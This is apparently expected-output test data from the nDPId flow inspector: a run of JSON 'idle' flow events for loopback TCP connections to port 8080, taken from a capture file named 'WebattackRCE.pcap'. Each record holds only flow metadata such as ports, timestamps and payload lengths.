-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 